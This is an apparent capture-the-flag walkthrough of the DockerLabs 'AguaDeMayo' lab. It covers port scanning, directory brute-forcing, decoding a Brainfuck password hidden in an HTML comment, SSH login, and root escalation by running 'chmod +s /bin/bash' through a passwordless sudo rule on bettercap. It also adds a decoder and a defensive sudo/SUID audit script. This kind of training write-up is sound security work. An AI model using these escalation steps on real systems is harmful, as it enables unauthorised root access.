[DockerLabs] AguaDeMayo Detailed Writeup
城南花已开 Lv5

Information Gathering

Service Detection

Before getting to that: deploying the target took me a long time. My Docker is installed in Ubuntu inside WSL, and my WSL networking mode is set to mirrored, which meant my Kali could not reach the Docker container running in Ubuntu. I used the target's own auto-deploy script for one-click deployment; I'm not sure whether the script simply doesn't set up port mapping when the container starts.

Both my Kali and my Ubuntu run in WSL. With networking set to mirrored, the IP is the same as the Windows host's, but Windows cannot reach the virtual interface that Docker creates inside WSL. Kali could ping the Docker virtual interface created by Ubuntu and nmap scanned it normally, yet the port 80 it found just could not be curled.

After switching to NAT, curl worked normally.

In other words, whether you use mirrored or NAT mode, the IP under WSL is shared, it is the same IP; as for whether Windows can reach it, I tried many methods and none of them worked.

The target itself is actually very easy; it's just that WSL has too many pitfalls.

❯ rustscan -a 172.17.0.2
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Port scanning: Making networking exciting since... whenever.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 172.17.0.2:22
Open 172.17.0.2:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-09 21:46 CST
Initiating ARP Ping Scan at 21:46
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 21:46, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:46
Completed Parallel DNS resolution of 1 host. at 21:46, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:46
Scanning 172.17.0.2 [2 ports]
Discovered open port 22/tcp on 172.17.0.2
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 21:46, 0.03s elapsed (2 total ports)
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.000029s latency).
Scanned at 2024-12-09 21:46:45 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 02:42:AC:11:00:02 (Unknown)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

We can see that port 80 is open.

Let's try curling it. Hidden in an HTML comment is a piece of text that looks encoded; it's recognisable as Brainfuck at a glance.

<!--
++++++++++[>++++++++++>++++++++++>++++++++++>++++++++++>++++++++++>++++++++++>++++++++++++>++++++++++>+++++++++++>++++++++++++>++++++++++>++++++++++++>++++++++++>+++++++++++>+++++++++++>+>+<<<<<<<<<<<<<<<<<-]>--.>+.>--.>+.>---.>+++.>---.>---.>+++.>---.>+..>-----..>---.>.>+.>+++.>.
-->

Decoding it gives bebeaguaqueessano
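As an added example (not code from the original post), here is a small Python Brainfuck interpreter that pulls HTML comments out of a page body, checks which ones look like Brainfuck, and decodes them; the SAMPLE_HTML page is constructed here around the comment shown above.

```python
import re

# Constructed sample: a minimal index page with the comment shown above embedded in it.
SAMPLE_HTML = """<html><body><h1>Agua de Mayo</h1>
<!--
++++++++++[>++++++++++>++++++++++>++++++++++>++++++++++>++++++++++>++++++++++>++++++++++++>++++++++++>+++++++++++>++++++++++++>++++++++++>++++++++++++>++++++++++>+++++++++++>+++++++++++>+>+<<<<<<<<<<<<<<<<<-]>--.>+.>--.>+.>---.>+++.>---.>---.>+++.>---.>+..>-----..>---.>.>+.>+++.>.
-->
</body></html>"""

BF_OPS = set("+-<>.,[]")

def extract_comments(html: str) -> list[str]:
    """Return the bodies of all HTML comments, whitespace-stripped."""
    return [m.strip() for m in re.findall(r"<!--(.*?)-->", html, re.S)]

def looks_like_brainfuck(text: str) -> bool:
    """Heuristic: every non-space character is a Brainfuck op and the loops balance."""
    body = "".join(text.split())
    return bool(body) and all(c in BF_OPS for c in body) and body.count("[") == body.count("]")

def run_brainfuck(src: str, max_steps: int = 1_000_000) -> str:
    """Execute a Brainfuck program with 8-bit wrapping cells; ',' (input) is treated as a no-op."""
    code = [c for c in src if c in BF_OPS]
    jump, stack = {}, []  # matching-bracket table so loop jumps are O(1)
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            j = stack.pop()
            jump[i], jump[j] = j, i
    tape, ptr, pc, out = [0] * 30000, 0, 0, []
    while pc < len(code) and max_steps > 0:
        c = code[pc]
        if c == ">": ptr += 1
        elif c == "<": ptr -= 1
        elif c == "+": tape[ptr] = (tape[ptr] + 1) % 256
        elif c == "-": tape[ptr] = (tape[ptr] - 1) % 256
        elif c == ".": out.append(chr(tape[ptr]))
        elif c == "[" and tape[ptr] == 0: pc = jump[pc]
        elif c == "]" and tape[ptr] != 0: pc = jump[pc]
        pc += 1
        max_steps -= 1
    return "".join(out)

def decode_hidden_comments(html: str) -> list[str]:
    """Run every comment that looks like Brainfuck and return the outputs with line endings stripped."""
    return [run_brainfuck(c).strip() for c in extract_comments(html) if looks_like_brainfuck(c)]
```

The program on the page ends by printing a carriage return and a newline, which is why the result is stripped before it is compared.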

Next, let's brute-force directories and see whether anything turns up.

❯ gobuster dir -u 172.17.0.2 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.17.0.2
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 275]
/.htpasswd (Status: 403) [Size: 275]
/.htaccess (Status: 403) [Size: 275]
/images (Status: 301) [Size: 309] [--> http://172.17.0.2/images/]
/index.html (Status: 200) [Size: 11142]
/server-status (Status: 403) [Size: 275]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

There is an images folder containing an image named agua_ssh.jpg

[image: agua_ssh.jpg]

Clearly, that is already a hint.

Let's try to SSH into the Docker container with the username agua; the password is the string decoded earlier.

User Privilege Escalation

❯ ssh agua@172.17.0.2
The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is SHA256:EZNhR2ojYOvInwAg+dpLntRab/b7eRvr60vq3sn7hH8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
agua@172.17.0.2's password:
Linux 5ed94ec8c875 5.15.167.4-microsoft-standard-WSL2 #1 SMP Tue Nov 5 00:21:55 UTC 2024 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 14 17:41:58 2024 from 172.17.0.1
agua@5ed94ec8c875:~$

We're in. Wait, what?! I didn't expect to get in this easily; I guess this lab is just on the easy side.

Root Privilege Escalation

agua@5ed94ec8c875:~$ id
uid=1000(agua) gid=1000(agua) groups=1000(agua),104(lxd)
agua@5ed94ec8c875:~$ sudo -l
Matching Defaults entries for agua on 5ed94ec8c875:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User agua may run the following commands on 5ed94ec8c875:
(root) NOPASSWD: /usr/bin/bettercap
agua@5ed94ec8c875:~$ sudo /usr/bin/bettercap
bettercap v2.32.0 (built for linux amd64 with go1.19.8) [type 'help' for a list of commands]

172.17.0.0/16 > 172.17.0.2 » [14:03:50] [sys.log] [war] exec: "ip": executable file not found in $PATH
172.17.0.0/16 > 172.17.0.2 » help

help MODULE : List available commands or show module specific help if no module name is provided.
active : Show information about active modules.
quit : Close the session and exit.
sleep SECONDS : Sleep for the given amount of seconds.
get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
set NAME VALUE : Set the VALUE of variable NAME.
read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
clear : Clear the screen.
include CAPLET : Load and run this caplet in the current session.
! COMMAND : Execute a shell command and print its output.
alias MAC NAME : Assign an alias to a given endpoint given its MAC address.

We find a sudo rule that lets us run bettercap, and this program can execute shell commands via ! COMMAND.

172.17.0.0/16 > 172.17.0.2  » ! chmod +s /bin/bash
172.17.0.0/16 > 172.17.0.2 » quit
open /proc/sys/net/ipv4/ip_forward: read-only file system

Give bash the SUID bit, quit, and then bash -p is all it takes.

agua@5ed94ec8c875:~$ bash -p
bash-5.2# whoami
root
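From the defender's side, as an added example that is not part of the original writeup: a Python audit that parses sudo -l output for passwordless root rules, names the reason when the allowed program is known to offer a shell escape (bettercap's ! COMMAND is the one above), and checks whether a binary carries the SUID bit, the two conditions this escalation relied on. SAMPLE_SUDO_L is constructed from the output shown above with one password-protected rule added for contrast; SHELL_ESCAPE_CAPABLE is an assumed inventory you would extend yourself.

```python
import os
import re
import stat
from dataclasses import dataclass
# Constructed from the sudo -l output shown above, plus one password-protected rule for contrast.
SAMPLE_SUDO_L = """Matching Defaults entries for agua on 5ed94ec8c875:
    env_reset, mail_badpass, use_pty
User agua may run the following commands on 5ed94ec8c875:
    (root) NOPASSWD: /usr/bin/bettercap
    (root) /usr/bin/apt-get
"""
SHELL_ESCAPE_CAPABLE = {"bettercap"}  # assumed inventory: programs whose prompt runs shell commands
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

@dataclass
class SudoRule:
    runas: str
    nopasswd: bool
    command: str

def parse_sudo_l(text: str) -> list[SudoRule]:
    """Parse the rule lines that follow 'may run the following commands'."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            rules.append(SudoRule(m["runas"].strip(), "NOPASSWD" in m["tags"], m["cmd"].strip()))
    return rules

def risky_rules(rules: list[SudoRule]) -> list[str]:
    """Flag passwordless root rules; say why when the target is known to offer a shell escape."""
    findings = []
    for r in rules:
        if r.nopasswd and r.runas.split(":")[0].strip().lower() in ("root", "all"):
            name = os.path.basename(r.command.split()[0])
            why = "shell escape to root" if name in SHELL_ESCAPE_CAPABLE else "passwordless root"
            findings.append(f"{r.command}: {why}")
    return findings

def mode_is_setuid(mode: int) -> bool:
    """True when the SUID bit is set in a stat mode, which is what 'chmod +s /bin/bash' produces."""
    return bool(mode & stat.S_ISUID)

def is_setuid(path: str) -> bool:
    return mode_is_setuid(os.stat(path).st_mode)  # e.g. is_setuid("/bin/bash") on the host
```

Run risky_rules(parse_sudo_l(output_of_sudo_l)) as part of a host review, and pair is_setuid with a baseline of expected SUID binaries so a shell that suddenly carries the bit stands out.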

I looked all over and didn't find a flag. Does it just end once you get root?!
